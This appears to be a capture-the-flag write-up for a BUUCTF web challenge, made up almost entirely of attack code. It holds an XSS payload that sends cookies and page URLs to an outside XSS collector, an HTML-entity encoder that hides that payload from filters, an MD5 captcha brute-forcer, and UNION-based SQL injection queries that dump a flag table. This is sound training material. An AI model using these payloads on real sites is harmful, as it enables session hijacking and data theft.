BUUCTF：[CISCN2019 华东北赛区]Web2-解题步骤详解

https://blog.csdn.net/weixin_44677409/article/details/100741998

index.phpadmin.phplogin.phpregister.phppost.phpcommitbug.phpabout.php

(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=arHAGx&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();1

xss='''(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=arHAGx&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();'''output = ""for c in xss:    output += "&#" + str(ord(c))
print("<svg><script>eval&#40&#34" + output + "&#34&#41</script>")

http://24175362-da9c-4f99-bb8d-110e10bfb9bf.node3.buuoj.cn/post/1b34bb5a26804f2410d6746d2129bb7b.html

import hashlib
def func(md5_val):    for x in range(999999, 100000000):        md5_value=hashlib.md5(str(x)).hexdigest()        if md5_value[:6]==md5_val:            return str(x)
if __name__ == '__main__':    print func('b76301')

http://web.node3.buuoj.cn/post/1b34bb5a26804f2410d6746d2129bb7b.html

-2 union select 1,2,3#
-2 union select 1,database(),user()#
-2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ciscn'#
-2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flag'#
-2 union select 1,2,group_concat(flagg) from ciscn.flag#